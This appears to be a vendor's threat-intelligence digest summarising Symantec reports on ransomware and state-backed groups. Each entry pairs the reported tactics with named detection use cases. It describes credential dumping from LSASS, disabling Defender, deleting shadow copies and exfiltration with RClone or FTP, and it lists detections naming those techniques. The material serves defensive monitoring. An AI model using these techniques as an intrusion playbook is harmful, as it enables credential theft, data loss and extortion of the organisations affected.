Ransomware Attack Techniques

May 03, 2022

Ransomware Attack Techniques

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of ransomware groups Hive, Conti, and Avoslocker, have identified frequently utilized tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP from weak or compromised credentials, and malware deployment through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote software such as AnyDesk and ConnectWise Control along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a vast array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using task manager to dump LSASS memory. Tools used for lateral movement includes PsExec, WMI, BITSAdmin, and Mimikatz. The tampering of Windows logs helped cover the attacker’s tracks. Data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, actors relied on RClone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution

Lazarus Operation Dream Job

April 19, 2022

Lazarus Operation Dream Job

Industry: Chemical & Information Technology | Level: Tactical | Source: Symantec

Symantec’s tracking of Lazarus, a North Korean advanced persistent threat (APT) has identified activity targeting chemical and information technology sectors in South Korea with Operation Dream Job observed since January 2022. Although the information technology sector was targeted it’s believed the attacks were intended to pivot to the chemical sector. The Operation Dream Job campaign has been active since August 2020, luring victims with themes in fictitious job postings targeting various sectors. A typical attack chain from the campaign has involved the execution of an HTM file to download a malicious DLL file to inject into a process; Symantec has identified process injection into “legitimate system management software INISAFE Web EX Client.” Additional activities observed included credentials obtained from dumping registry keys, executing a BAT file and creating scheduled tasks for persistence.

  • Anvilogic Scenario: Lazarus – Operation Dream Job – Target Chemical Sector
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Create/Modify Schtasks
    • Suspicious File written to Disk
    • Windows FTP Exfiltration
    • Credentials in Registry
    • Executable Create Script Process
    • Rare remote thread
    • Control Panel Abuse

DoubleZero Wiper

March 25, 2022

March 22nd, 2022: DoubleZero Wiper

Industry: N/A | Level: Strategic | Source: Symantec

Reporting for the latest wiper, DoubleZero continues to be limited. A brief analysis from Symantec identified the wiper to be written in .NET code that is obfuscated and “overwrites or uses API calls to zero out critical system files and registry keys.” The list of wipers observed now includes WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper and DoubleZero.

Antlion APT Group

February 08, 2022

Antlion APT Group

Industry: Financial & Manufacturing | Level: Tactical | Source: Symantec

Symantec reports of threat activity from Antlion, a Chinese state-backed APT group. For the past 18 months, the threat group has been actively targeting Taiwanese financial institutions. The group’s operations involve long dwell times. Recent attacks observed of a financial organization, having been approximately 250 days on the network, and another attack of a manufacturing organization with an observed 175 days. A custom backdoor, xPack is leveraged by the group. Threat activity observed in a case study, identified the group running various commands (example with WMI), exploiting EternalBlue, gathering credentials from the registry, running PsExec and archiving collected data. There are undefined gaps in threat activity, continuing to emphasize the group’s slow methodical pace.

  • Anvilogic Use Cases:
    • WinRM Tools
    • Credentials in Registry
    • Remote Admin Tools
    • Locate Credentials

ALPHV/BlackCat ransomware – Technical Information from Symantec

December 21, 2021

ALPHV/BlackCat ransomware – Technical Information from Symantec

Industry: N/A | Level: Operational | Source: Symantec

Emerging ALPHV/BlackCat ransomware, written in the Rust programming language, was examined by Symantec. An observed attack chain identified suspicious activity on a victim network on November 3rd, 2021 leading to the ransomwares deployment on November 18th. Initial activity on November 3rd started with suspicious SMB requests followed by a registry dump of the Local Security Authority (LSA). Shortly after, PsExec was executed it launched a command prompt disabling ‘RestrictedAdmin mode’ in the registry. The activity was silent until November 18th when PsExec disabled Windows Defender with PowerShell and added “*.exe” to an AV exclusion list. The ransomware was then deployed using PsExec. Symantec’s review of the samples identified the attack was specifically targeted at the victim organization as “victim’s administrative credentials are embedded as part of the configuration block”.

  • Anvilogic Scenario: Initial ALPHV/BlackCat Ransomware – Behaviors
  • Anvilogic Use Cases:
    • ProcDump Credential Harvest
    • Task Manager lsass Dump
    • Remote Admin Tools
    • Registry key added with reg.exe

Yanluowang Ransomware Linked to Thieflock Affiliate

December 01, 2021

Yanluowang Ransomware Linked to Thieflock Affiliate

Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec

Yanluowang ransomware group, active since at least August 2021, have been targeting US Corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to Theiflock ransomware attacks. Based on observations by Symantec, it seems there is a link, or a shifting of allegiances from Thieflock to the Yanluowang ransomware family. Notable noticed TTP patterns have been the usage of BazarLoader for initial access, PowerShell to download tools enabling RDP in the registry, Adfind for reconnaissance, and the usage of other various credential-stealing tools.

  • Anvilogic Scenario: Yanluowang Ransomware – Behaviors
  • Anvilogic Use Cases:
    • RDP Enabled
    • Adfind Execution
    • pypykatz commands